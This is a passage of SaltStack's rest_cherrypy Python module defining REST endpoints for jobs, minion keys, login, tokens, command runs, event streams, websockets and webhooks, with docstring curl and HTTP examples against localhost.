:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs
.. code-block:: text
GET /jobs HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
- '20121130104633606931':
Arguments:
- '3'
Function: test.fib
Start Time: 2012, Nov 30 10:46:33.606931
Target: jerry
Target-type: glob
**Example request:**
.. code-block:: bash
curl -i localhost:8000/jobs/20121130104633606931
.. code-block:: text
GET /jobs/20121130104633606931 HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
info:
- Arguments:
- '3'
Function: test.fib
Minions:
- jerry
Start Time: 2012, Nov 30 10:46:33.606931
Target: '*'
Target-type: glob
User: saltdev
jid: '20121130104633606931'
return:
- jerry:
- - 0
- 1
- 1
- 2
- 6.9141387939453125e-06
"""
lowstate = {"client": "runner"}
if jid:
lowstate.update({"fun": "jobs.list_job", "jid": jid})
else:
lowstate.update({"fun": "jobs.list_jobs"})
cherrypy.request.lowstate = [lowstate]
job_ret_info = list(self.exec_lowstate(token=cherrypy.session.get("token")))
ret = {}
if jid:
ret["info"] = [job_ret_info[0]]
minion_ret = {}
returns = job_ret_info[0].get("Result")
for minion in returns:
minion_ret[minion] = returns[minion].get("return")
ret["return"] = [minion_ret]
else:
ret["return"] = [job_ret_info[0]]
return ret
class Keys(LowDataAdapter):
"""
Convenience URLs for working with minion keys
.. versionadded:: 2014.7.0
These URLs wrap the functionality provided by the :py:mod:`key wheel
module <salt.wheel.key>` functions.
"""
def GET(self, mid=None): # pylint: disable=arguments-differ
"""
Show the list of minion keys or detail on a specific key
.. versionadded:: 2014.7.0
.. http:get:: /keys/(mid)
List all keys or show a specific key
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys
.. code-block:: text
GET /keys HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 165
Content-Type: application/x-yaml
return:
local:
- master.pem
- master.pub
minions:
- jerry
minions_pre: []
minions_rejected: []
**Example request:**
.. code-block:: bash
curl -i localhost:8000/keys/jerry
.. code-block:: text
GET /keys/jerry HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
minions:
jerry: 51:93:b3:d0:9f:3a:6d:e5:28:67:c2:4b:27:d6:cd:2b
"""
if mid:
lowstate = [{"client": "wheel", "fun": "key.finger", "match": mid}]
else:
lowstate = [{"client": "wheel", "fun": "key.list_all"}]
cherrypy.request.lowstate = lowstate
result = self.exec_lowstate(token=cherrypy.session.get("token"))
return {"return": next(result, {}).get("data", {}).get("return", {})}
@cherrypy.config(**{"tools.hypermedia_out.on": False, "tools.sessions.on": False})
def POST(self, **kwargs):
r"""
Easily generate keys for a minion and auto-accept the new key
Accepts all the same parameters as the :py:func:`key.gen_accept
<salt.wheel.key.gen_accept>` function.
.. note:: A note about ``curl``
Avoid using the ``-i`` flag or HTTP headers will be written and
produce an invalid tar file.
Example partial kickstart script to bootstrap a new minion:
.. code-block:: text
%post
mkdir -p /etc/salt/pki/minion
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
| tar -C /etc/salt/pki/minion -xf -
mkdir -p /etc/salt/minion.d
printf 'master: 10.0.0.5\nid: jerry' > /etc/salt/minion.d/id.conf
%end
.. http:post:: /keys
Generate a public and private key and return both as a tarball
Authentication credentials must be passed in the request.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/keys \
-d mid=jerry \
-d username=kickstart \
-d password=kickstart \
-d eauth=pam \
-o jerry-salt-keys.tar
.. code-block:: text
POST /keys HTTP/1.1
Host: localhost:8000
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 10240
Content-Disposition: attachment; filename="saltkeys-jerry.tar"
Content-Type: application/x-tar
jerry.pub0000644000000000000000000000070300000000000010730 0ustar 00000000000000
"""
lowstate = cherrypy.request.lowstate
lowstate[0].update({"client": "wheel", "fun": "key.gen_accept"})
if "mid" in lowstate[0]:
lowstate[0]["id_"] = lowstate[0].pop("mid")
result = self.exec_lowstate()
ret = next(result, {}).get("data", {}).get("return", {})
pub_key = ret.get("pub", "")
pub_key_file = tarfile.TarInfo("minion.pub")
pub_key_file.size = len(pub_key)
priv_key = ret.get("priv", "")
priv_key_file = tarfile.TarInfo("minion.pem")
priv_key_file.size = len(priv_key)
fileobj = io.BytesIO()
tarball = tarfile.open(fileobj=fileobj, mode="w")
pub_key = pub_key.encode(__salt_system_encoding__)
priv_key = priv_key.encode(__salt_system_encoding__)
tarball.addfile(pub_key_file, io.BytesIO(pub_key))
tarball.addfile(priv_key_file, io.BytesIO(priv_key))
tarball.close()
headers = cherrypy.response.headers
headers[
"Content-Disposition"
] = 'attachment; filename="saltkeys-{}.tar"'.format(lowstate[0]["id_"])
headers["Content-Type"] = "application/x-tar"
headers["Content-Length"] = len(fileobj.getvalue())
headers["Cache-Control"] = "no-cache"
fileobj.seek(0)
return fileobj
class Login(LowDataAdapter):
"""
Log in to receive a session token
:ref:`Authentication information <rest_cherrypy-auth>`.
"""
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.auth = salt.auth.Resolver(self.opts)
def GET(self):
"""
Present the login interface
.. http:get:: /login
An explanation of how to log in.
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -i localhost:8000/login
.. code-block:: text
GET /login HTTP/1.1
Host: localhost:8000
Accept: text/html
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: text/html
"""
cherrypy.response.headers["WWW-Authenticate"] = "Session"
return {
"status": cherrypy.response.status,
"return": "Please log in",
}
def POST(self, **kwargs):
"""
:ref:`Authenticate <rest_cherrypy-auth>` against Salt's eauth system
.. http:post:: /login
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:reqheader Content-Type: |req_ct|
:form eauth: the eauth backend configured for the user
:form username: username
:form password: password
:status 200: |200|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -si localhost:8000/login \\
-c ~/cookies.txt \\
-H "Accept: application/json" \\
-H "Content-type: application/json" \\
-d '{
"username": "saltuser",
"password": "saltuser",
"eauth": "auto"
}'
.. code-block:: text
POST / HTTP/1.1
Host: localhost:8000
Content-Length: 42
Content-Type: application/json
Accept: application/json
{"username": "saltuser", "password": "saltuser", "eauth": "auto"}
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
Content-Length: 206
X-Auth-Token: 6d1b722e
Set-Cookie: session_id=6d1b722e; expires=Sat, 17 Nov 2012 03:23:52 GMT; Path=/
{"return": {
"token": "6d1b722e",
"start": 1363805943.776223,
"expire": 1363849143.776224,
"user": "saltuser",
"eauth": "pam",
"perms": [
"grains.*",
"status.*",
"sys.*",
"test.*"
]
}}
"""
if not self.api._is_master_running():
raise salt.exceptions.SaltDaemonNotRunning("Salt Master is not available.")
# the urlencoded_processor will wrap this in a list
if isinstance(cherrypy.serving.request.lowstate, list):
creds = cherrypy.serving.request.lowstate[0]
else:
creds = cherrypy.serving.request.lowstate
username = creds.get("username", None)
# Validate against the whitelist.
if not salt_api_acl_tool(username, cherrypy.request):
raise cherrypy.HTTPError(401)
# Mint token.
token = self.auth.mk_token(creds)
if "token" not in token:
raise cherrypy.HTTPError(
401, "Could not authenticate using provided credentials"
)
cherrypy.response.headers["X-Auth-Token"] = cherrypy.session.id
cherrypy.session["token"] = token["token"]
cherrypy.session["timeout"] = (token["expire"] - token["start"]) / 60
# Grab eauth config for the current backend for the current user
try:
eauth = self.opts.get("external_auth", {}).get(token["eauth"], {})
if token["eauth"] == "django" and "^model" in eauth:
perms = token["auth_list"]
else:
# Get sum of '*' perms, user-specific perms, and group-specific perms
perms = eauth.get(token["name"], [])
perms.extend(eauth.get("*", []))
if "groups" in token and token["groups"]:
user_groups = set(token["groups"])
eauth_groups = {
i.rstrip("%") for i in eauth.keys() if i.endswith("%")
}
for group in user_groups & eauth_groups:
perms.extend(eauth["{}%".format(group)])
if not perms:
logger.debug("Eauth permission list not found.")
except Exception: # pylint: disable=broad-except
logger.debug(
"Configuration for external_auth malformed for "
"eauth '{}', and user '{}'.".format(
token.get("eauth"), token.get("name")
),
exc_info=True,
)
perms = None
return {
"return": [
{
"token": cherrypy.session.id,
"expire": token["expire"],
"start": token["start"],
"user": token["name"],
"eauth": token["eauth"],
"perms": perms or {},
}
]
}
class Logout(LowDataAdapter):
"""
Class to remove or invalidate sessions
"""
_cp_config = dict(
LowDataAdapter._cp_config,
**{"tools.salt_auth.on": True, "tools.lowdata_fmt.on": False}
)
def POST(self): # pylint: disable=arguments-differ
"""
Destroy the currently active session and expire the session cookie
"""
cherrypy.lib.sessions.expire() # set client-side to expire
cherrypy.session.regenerate() # replace server-side with new
return {"return": "Your token has been cleared"}
class Token(LowDataAdapter):
"""
Generate a Salt token from eauth credentials
Wraps functionality in the :py:mod:`auth Runner <salt.runners.auth>`.
.. versionadded:: 2017.7.0
"""
@cherrypy.config(**{"tools.sessions.on": False})
def POST(self, **kwargs):
r"""
.. http:post:: /token
Generate a Salt eauth token
:status 200: |200|
:status 400: |400|
:status 401: |401|
**Example request:**
.. code-block:: bash
curl -sSk https://localhost:8000/token \
-H 'Content-type: application/json' \
-d '{
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}'
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Type: application/json
[{
"start": 1494987445.528182,
"token": "e72ca1655d05...",
"expire": 1495030645.528183,
"name": "saltdev",
"eauth": "auto"
}]
"""
for creds in cherrypy.request.lowstate:
try:
creds.update(
{
"client": "runner",
"fun": "auth.mk_token",
"kwarg": {
"username": creds["username"],
"password": creds["password"],
"eauth": creds["eauth"],
},
}
)
except KeyError:
raise cherrypy.HTTPError(
400, 'Require "username", "password", and "eauth" params'
)
return list(self.exec_lowstate())
class Run(LowDataAdapter):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>`
salt-api does not enforce authorization, Salt's eauth system does that.
Local/Runner/WheelClient all accept ``username``/``password``/``eauth``
**or** ``token`` kwargs that are then checked by the eauth system. The
session mechanism in ``rest_cherrypy`` simply pairs a session with a Salt
eauth token and then passes the ``token`` kwarg in automatically.
If you already have a Salt eauth token, perhaps generated by the
:py:func:`mk_token <salt.runners.auth.mk_token>` function in the Auth
Runner module, then there is no reason to use sessions.
This endpoint accepts either a ``username``, ``password``, ``eauth`` trio,
**or** a ``token`` kwarg and does not make use of sessions at all.
"""
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.sessions.on": False})
def POST(self, **kwargs):
"""
Run commands bypassing the :ref:`normal session handling
<rest_cherrypy-auth>` Other than that this URL is identical to the
:py:meth:`root URL (/) <LowDataAdapter.POST>`.
.. http:post:: /run
An array of lowstate data describing Salt commands must be sent in
the request body.
:status 200: |200|
:status 400: |400|
:status 401: |401|
:status 406: |406|
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"username": "saltdev",
"password": "saltdev",
"eauth": "auto"
}]'
**Or** using a Salt Eauth token:
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-H 'Content-type: application/json' \\
-d '[{
"client": "local",
"tgt": "*",
"fun": "test.ping",
"token": "<salt eauth token here>"
}]'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/json
[{"client": "local", "tgt": "*", "fun": "test.ping", "username": "saltdev", "password": "saltdev", "eauth": "auto"}]
**Example response:**
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 73
Content-Type: application/x-yaml
return:
- ms-0: true
ms-1: true
ms-2: true
ms-3: true
ms-4: true
The /run endpoint can also be used to issue commands using the salt-ssh
subsystem.
When using salt-ssh, eauth credentials should not be supplied. Instead,
authentication should be handled by the SSH layer itself. The use of
the salt-ssh client does not require a salt master to be running.
Instead, only a roster file must be present in the salt configuration
directory.
All SSH client requests are synchronous.
**Example SSH client request:**
.. code-block:: bash
curl -sS localhost:8000/run \\
-H 'Accept: application/x-yaml' \\
-d client='ssh' \\
-d tgt='*' \\
-d fun='test.ping'
.. code-block:: text
POST /run HTTP/1.1
Host: localhost:8000
Accept: application/x-yaml
Content-Length: 75
Content-Type: application/x-www-form-urlencoded
client=ssh&tgt=*&fun=test.ping
**Example SSH response:**
.. code-block:: text
return:
- silver:
fun: test.ping
fun_args: []
id: silver
jid: '20141203103525666185'
retcode: 0
return: true
success: true
"""
return {
"return": list(self.exec_lowstate()),
}
class Events:
"""
Expose the Salt event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.resolver = salt.auth.Resolver(self.opts)
def _is_valid_token(self, auth_token):
"""
Check if this is a valid salt-api token or valid Salt token
salt-api tokens are regular session tokens that tie back to a real Salt
token. Salt tokens are tokens generated by Salt's eauth system.
:return bool: True if valid, False if not valid.
"""
# Make sure that auth token is hex. If it's None, or something other
# than hex, this will raise a ValueError.
try:
int(auth_token, 16)
except (TypeError, ValueError):
return False
# First check if the given token is in our session table; if so it's a
# salt-api token and we need to get the Salt token from there.
orig_session, _ = cherrypy.session.cache.get(auth_token, ({}, None))
# If it's not in the session table, assume it's a regular Salt token.
salt_token = orig_session.get("token", auth_token)
# The eauth system does not currently support perms for the event
# stream, so we're just checking if the token exists not if the token
# allows access.
if salt_token and self.resolver.get_token(salt_token):
return True
return False
def GET(self, token=None, salt_token=None):
r"""
An HTTP stream of the Salt master event bus
This stream is formatted per the Server Sent Events (SSE) spec. Each
event is formatted as JSON.
.. http:get:: /events
:status 200: |200|
:status 401: |401|
:status 406: |406|
:query token: **optional** parameter containing the token
ordinarily supplied via the X-Auth-Token header in order to
allow cross-domain requests in browsers that do not include
CORS support in the EventSource API. E.g.,
``curl -NsS localhost:8000/events?token=308650d``
:query salt_token: **optional** parameter containing a raw Salt
*eauth token* (not to be confused with the token returned from
the /login URL). E.g.,
``curl -NsS localhost:8000/events?salt_token=30742765``
**Example request:**
.. code-block:: bash
curl -NsS localhost:8000/events
.. code-block:: text
GET /events HTTP/1.1
Host: localhost:8000
**Example response:**
Note, the ``tag`` field is not part of the spec. SSE compliant clients
should ignore unknown fields. This addition allows non-compliant
clients to only watch for certain tags without having to deserialize the
JSON object each time.
.. code-block:: text
HTTP/1.1 200 OK
Connection: keep-alive
Cache-Control: no-cache
Content-Type: text/event-stream;charset=utf-8
retry: 400
tag: salt/job/20130802115730568475/new
data: {'tag': 'salt/job/20130802115730568475/new', 'data': {'minions': ['ms-4', 'ms-3', 'ms-2', 'ms-1', 'ms-0']}}
tag: salt/job/20130802115730568475/ret/jerry
data: {'tag': 'salt/job/20130802115730568475/ret/jerry', 'data': {'jid': '20130802115730568475', 'return': True, 'retcode': 0, 'success': True, 'cmd': '_return', 'fun': 'test.ping', 'id': 'ms-1'}}
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
var source = new EventSource('/events');
source.onopen = function() { console.info('Listening ...') };
source.onerror = function(err) { console.error(err) };
source.onmessage = function(message) {
var saltEvent = JSON.parse(message.data);
console.log(saltEvent.tag, saltEvent.data);
};
Note, the SSE stream is fast and completely asynchronous and Salt is
very fast. If a job is created using a regular POST request, it is
possible that the job return will be available on the SSE stream before
the response for the POST request arrives. It is important to take that
asynchronicity into account when designing an application. Below are
some general guidelines.
* Subscribe to the SSE stream _before_ creating any events.
* Process SSE events directly as they arrive and don't wait for any
other process to "complete" first (like an ajax request).
* Keep a buffer of events if the event stream must be used for
  synchronous lookups (a minimal sketch follows this list).
* Be cautious in writing Salt's event stream directly to the DOM. It is
very busy and can quickly overwhelm the memory allocated to a
browser tab.
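As a rough illustration of the buffering guideline above (this helper is not
part of the rest_cherrypy API; the ``EventBuffer`` name and its methods are
purely hypothetical), return events can be stored keyed by jid so that a
later, synchronous lookup does not race the stream:
.. code-block:: python
    import collections
    import json
    class EventBuffer:
        '''Hold recent return events keyed by jid for later lookup.'''
        def __init__(self, maxlen=1000):
            # Bound the buffer so a busy event bus cannot exhaust memory.
            self.returns = collections.OrderedDict()
            self.maxlen = maxlen
        def feed(self, sse_data):
            # sse_data is the JSON payload taken from a single ``data:`` line.
            event = json.loads(sse_data)
            tag = event.get('tag', '')
            if '/ret/' in tag:
                jid = tag.split('/')[2]
                self.returns[jid] = event['data']
                while len(self.returns) > self.maxlen:
                    self.returns.popitem(last=False)
        def lookup(self, jid):
            # Synchronous lookup; returns None if the return has not arrived yet.
            return self.returns.get(jid)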
A full, working proof-of-concept JavaScript application is available
:blob:`adjacent to this file <salt/netapi/rest_cherrypy/index.html>`.
It can be viewed by pointing a browser at the ``/app`` endpoint in a
running ``rest_cherrypy`` instance.
Or using CORS:
.. code-block:: javascript
var source = new EventSource('/events?token=ecd589e4e01912cf3c4035afad73426dbb8dba75', {withCredentials: true});
It is also possible to consume the stream via the shell.
Records are separated by blank lines; the ``data:`` and ``tag:``
prefixes will need to be removed manually before attempting to
unserialize the JSON.
curl's ``-N`` flag disables output buffering, which is required to
process the stream incrementally.
Here is a basic example of printing each event as it comes in:
.. code-block:: bash
curl -NsS localhost:8000/events |\
while IFS= read -r line ; do
echo $line
done
Here is an example of using awk to filter events based on tag:
.. code-block:: bash
curl -NsS localhost:8000/events |\
awk '
BEGIN { RS=""; FS="\\n" }
$1 ~ /^tag: salt\/job\/[0-9]+\/new$/ { print $0 }
'
tag: salt/job/20140112010149808995/new
data: {"tag": "salt/job/20140112010149808995/new", "data": {"tgt_type": "glob", "jid": "20140112010149808995", "tgt": "jerry", "_stamp": "2014-01-12_01:01:49.809617", "user": "shouse", "arg": [], "fun": "test.ping", "minions": ["jerry"]}}
tag: 20140112010149808995
data: {"tag": "20140112010149808995", "data": {"fun_args": [], "jid": "20140112010149808995", "return": true, "retcode": 0, "success": true, "cmd": "_return", "_stamp": "2014-01-12_01:01:49.819316", "fun": "test.ping", "id": "jerry"}}
"""
cookies = cherrypy.request.cookie
auth_token = (
token
or salt_token
or (cookies["session_id"].value if "session_id" in cookies else None)
)
if not self._is_valid_token(auth_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
cherrypy.response.headers["Content-Type"] = "text/event-stream"
cherrypy.response.headers["Cache-Control"] = "no-cache"
cherrypy.response.headers["Connection"] = "keep-alive"
def listen():
"""
An iterator to yield Salt events
"""
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
yield "retry: 400\n" # future lint: disable=blacklisted-function
while True:
data = next(stream)
yield "tag: {}\n".format(
data.get("tag", "")
) # future lint: disable=blacklisted-function
yield "data: {}\n\n".format(
salt.utils.json.dumps(data)
) # future lint: disable=blacklisted-function
return listen()
class WebsocketEndpoint:
"""
Open a WebSocket connection to Salt's event bus
The event bus on the Salt master exposes a large variety of things, notably
when executions are started on the master and also when minions ultimately
return their results. This URL provides a real-time window into a running
Salt infrastructure. Uses websocket as the transport mechanism.
.. seealso:: :ref:`events`
"""
exposed = True
_cp_config = dict(
LowDataAdapter._cp_config,
**{
"response.stream": True,
"tools.encode.encoding": "utf-8",
# Auth handled manually below
"tools.salt_auth.on": False,
"tools.hypermedia_in.on": False,
"tools.hypermedia_out.on": False,
"tools.websocket.on": True,
"tools.websocket.handler_cls": websockets.SynchronizingWebsocket,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.auth = salt.auth.LoadAuth(self.opts)
def GET(self, token=None, **kwargs):
"""
Return a websocket connection of Salt's event stream
.. http:get:: /ws/(token)
:query format_events: The event stream will undergo server-side
formatting if the ``format_events`` URL parameter is included
in the request. This can be useful to avoid formatting on the
client-side:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws?format_events
:reqheader X-Auth-Token: an authentication token from
:py:class:`~Login`.
:status 101: switching to the websockets protocol
:status 401: |401|
:status 406: |406|
**Example request:** ::
curl -NsSk \\
-H 'X-Auth-Token: ffedf49d' \\
-H 'Host: localhost:8000' \\
-H 'Connection: Upgrade' \\
-H 'Upgrade: websocket' \\
-H 'Origin: https://localhost:8000' \\
-H 'Sec-WebSocket-Version: 13' \\
-H 'Sec-WebSocket-Key: '"$(echo -n $RANDOM | base64)" \\
localhost:8000/ws
.. code-block:: text
GET /ws HTTP/1.1
Connection: Upgrade
Upgrade: websocket
Host: localhost:8000
Origin: https://localhost:8000
Sec-WebSocket-Version: 13
Sec-WebSocket-Key: s65VsgHigh7v/Jcf4nXHnA==
X-Auth-Token: ffedf49d
**Example response**:
.. code-block:: text
HTTP/1.1 101 Switching Protocols
Upgrade: websocket
Connection: Upgrade
Sec-WebSocket-Accept: mWZjBV9FCglzn1rIKJAxrTFlnJE=
Sec-WebSocket-Version: 13
An authentication token **may optionally** be passed as part of the URL
for browsers that cannot be configured to send the authentication
header or cookie:
.. code-block:: bash
curl -NsS <...snip...> localhost:8000/ws/ffedf49d
The event stream can be easily consumed via JavaScript:
.. code-block:: javascript
// Note, you must be authenticated!
var source = new WebSocket('ws://localhost:8000/ws/d0ce6c1a');
source.onerror = function(e) { console.debug('error!', e); };
source.onmessage = function(e) { console.debug(e.data); };
source.send('websocket client ready')
source.close();
Or via Python, using the Python module `websocket-client
<https://pypi.python.org/pypi/websocket-client/>`_ for example.
.. code-block:: python
# Note, you must be authenticated!
from websocket import create_connection
ws = create_connection('ws://localhost:8000/ws/d0ce6c1a')
ws.send('websocket client ready')
# Look at https://pypi.python.org/pypi/websocket-client/ for more
# examples.
while listening_to_events:
print(ws.recv())
ws.close()
The examples above show how to establish a websocket connection to Salt
and activate real-time updates from Salt's event stream by signaling
``websocket client ready``.
"""
# Pulling the session token from a URL param is a workaround for
# browsers that do not support CORS in the EventSource API.
if token:
orig_session, _ = cherrypy.session.cache.get(token, ({}, None))
salt_token = orig_session.get("token")
else:
salt_token = cherrypy.session.get("token")
# Manually verify the token
if not salt_token or not self.auth.get_tok(salt_token):
raise cherrypy.HTTPError(401)
# Release the session lock before starting the long-running response
cherrypy.session.release_lock()
# A handler is the server side end of the websocket connection. Each
# request spawns a new instance of this handler
handler = cherrypy.request.ws_handler
def event_stream(handler, pipe):
"""
An iterator to return Salt events (and optionally format them)
"""
# blocks until send is called on the parent end of this pipe.
pipe.recv()
event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=True,
)
stream = event.iter_events(full=True, auto_reconnect=True)
SaltInfo = event_processor.SaltInfo(handler)
def signal_handler(signal, frame):
os._exit(0)
signal.signal(signal.SIGTERM, signal_handler)
while True:
data = next(stream)
if data:
try: # work around try to decode catch unicode errors
if "format_events" in kwargs:
SaltInfo.process(data, salt_token, self.opts)
else:
handler.send(
"data: {}\n\n".format(
salt.utils.json.dumps(data)
), # future lint: disable=blacklisted-function
False,
)
except UnicodeDecodeError:
logger.error(
"Error: Salt event has non UTF-8 data:\n{}".format(data)
)
parent_pipe, child_pipe = Pipe()
handler.pipe = parent_pipe
handler.opts = self.opts
# Process to handle asynchronous push to a client.
# Each GET request causes a process to be kicked off.
proc = Process(target=event_stream, args=(handler, child_pipe))
proc.start()
class Webhook:
"""
A generic web hook entry point that fires an event on Salt's event bus
External services can POST data to this URL to trigger an event in Salt.
For example, Amazon SNS, Jenkins-CI or Travis-CI, or GitHub web hooks.
.. note:: Be mindful of security
Salt's Reactor can run any code. A Reactor SLS that responds to a hook
event is responsible for validating that the event came from a trusted
source and contains valid data.
**This is a generic interface and securing it is up to you!**
This URL requires authentication; however, not all external services can
be configured to authenticate. For this reason, authentication can be
selectively disabled for this URL. Follow best practices -- always use
SSL, pass a secret key, configure the firewall to only allow traffic
from a known source, etc.
The event data is taken from the request body. The
:mailheader:`Content-Type` header is respected for the payload.
The event tag is prefixed with ``salt/netapi/hook`` and the URL path is
appended to the end. For example, a ``POST`` request sent to
``/hook/mycompany/myapp/mydata`` will produce a Salt event with the tag
``salt/netapi/hook/mycompany/myapp/mydata``.
The following is an example ``.travis.yml`` file to send notifications to
Salt of successful test runs:
.. code-block:: yaml
language: python
script: python -m unittest tests
after_success:
- |
curl -sSk https://saltapi-url.example.com:8000/hook/travis/build/success \
-d branch="${TRAVIS_BRANCH}" \
-d commit="${TRAVIS_COMMIT}"
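The same hook can be fired from any environment that can issue an HTTP
request. Below is a minimal sketch using only the Python standard library;
the URL, branch, and commit values are placeholders, and it assumes
authentication has been disabled for the hook URL (or that a token header
is added):
.. code-block:: python
    import json
    import urllib.request
    payload = json.dumps({'branch': 'master', 'commit': 'abc123'}).encode('utf-8')
    req = urllib.request.Request(
        'https://saltapi-url.example.com:8000/hook/travis/build/success',
        data=payload,
        headers={'Content-Type': 'application/json'},
    )
    # On success the response body is the JSON document {"success": true}.
    with urllib.request.urlopen(req) as resp:
        print(resp.read())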
.. seealso:: :ref:`events`, :ref:`reactor <reactor>`
"""
exposed = True
tag_base = ["salt", "netapi", "hook"]
_cp_config = dict(
LowDataAdapter._cp_config,
**{
# Don't do any lowdata processing on the POST data
"tools.lowdata_fmt.on": True,
# Auth can be overridden in __init__().
"tools.salt_auth.on": True,
}
)
def __init__(self):
self.opts = cherrypy.config["saltopts"]
self.event = salt.utils.event.get_event(
"master",
sock_dir=self.opts["sock_dir"],
transport=self.opts["transport"],
opts=self.opts,
listen=False,
)
if cherrypy.config["apiopts"].get("webhook_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def POST(self, *args, **kwargs):
"""
Fire an event in Salt with a custom event tag and data
.. http:post:: /hook
:status 200: |200|
:status 401: |401|
:status 406: |406|
:status 413: request body is too large
**Example request:**
.. code-block:: bash
curl -sS localhost:8000/hook \\
-H 'Content-type: application/json' \\
-d '{"foo": "Foo!", "bar": "Bar!"}'
.. code-block:: text
POST /hook HTTP/1.1
Host: localhost:8000
Content-Length: 16
Content-Type: application/json
{"foo": "Foo!", "bar": "Bar!"}
**Example response**:
.. code-block:: text
HTTP/1.1 200 OK
Content-Length: 14
Content-Type: application/json
{"success": true}
As a practical example, an internal continuous-integration build
server could send an HTTP POST request to the URL
``https://localhost:8000/hook/mycompany/build/success`` which contains
the result of a build and the SHA of the version that was built as
JSON. That would then produce the following event in Salt that could be
used to kick off a deployment via Salt's Reactor::
Event fired at Fri Feb 14 17:40:11 2014
*************************
Tag: salt/netapi/hook/mycompany/build/success
Data:
{'_stamp': '2014-02-14_17:40:11.440996',
'headers': {
'X-My-Secret-Key': 'F0fAgoQjIT@W',
'Content-Length': '37',
'Content-Type': 'application/json',
'Host': 'localhost:8000',
'Remote-Addr': '127.0.0.1'},
'post': {'revision': 'aa22a3c4b2e7', 'result': True}}
Salt's Reactor could listen for the event:
.. code-block:: yaml
reactor:
- 'salt/netapi/hook/mycompany/build/*':
- /srv/reactor/react_ci_builds.sls
And finally deploy the new build:
.. code-block:: jinja
{% set secret_key = data.get('headers', {}).get('X-My-Secret-Key') %}
{% set build = data.get('post', {}) %}
{% if secret_key == 'F0fAgoQjIT@W' and build.result == True %}
deploy_my_app:
cmd.state.sls:
- tgt: 'application*'
- arg:
- myapp.deploy
- kwarg:
pillar:
revision: {{ build.revision }}
{% endif %}
"""
tag = "/".join(itertools.chain(self.tag_base, args))
data = cherrypy.serving.request.unserialized_data
if not data:
data = {}
raw_body = getattr(cherrypy.serving.request, "raw_body", "")
headers = dict(cherrypy.request.headers)
ret = self.event.fire_event(
{"body": raw_body, "post": data, "headers": headers}, tag
)
return {"success": ret}
class Stats:
"""
Expose statistics on the running CherryPy server
"""
exposed = True
_cp_config = dict(LowDataAdapter._cp_config, **{"tools.salt_auth.on": True})
def __init__(self):
if cherrypy.config["apiopts"].get("stats_disable_auth"):
self._cp_config["tools.salt_auth.on"] = False
def GET(self):
"""
Return a dump of statistics collected from the CherryPy server
.. http:get:: /stats
:reqheader X-Auth-Token: |req_token|
:reqheader Accept: |req_accept|
:resheader Content-Type: |res_ct|
:status 200: |200|
:status 401: |401|
:status 406: |406|
"""
if hasattr(logging, "statistics"):
return cpstats.extrapolate_statistics(logging.statistics)
return {}
class App:
"""
Class to serve HTML5 apps
"""
exposed = True
def GET(self, *args):
"""
Serve a single static file ignoring the remaining path
This is useful in combination with a browser-based app using the HTML5
history API.
.. http::get:: /app
:reqheader X-Auth-Token: |req_token|
:status 200: |200|
:status 401: |401|
"""
apiopts = cherrypy.config["apiopts"]
default_index = os.path.abspath(
os.path.join(os.path.dirname(__file__), "index.html")
)
return cherrypy.lib.static.serve_file(apiopts.get("app", default_index))
class API:
"""
Collect configuration and URL map for building the CherryPy app
"""
url_map = {
"index": LowDataAdapter,
"login": Login,
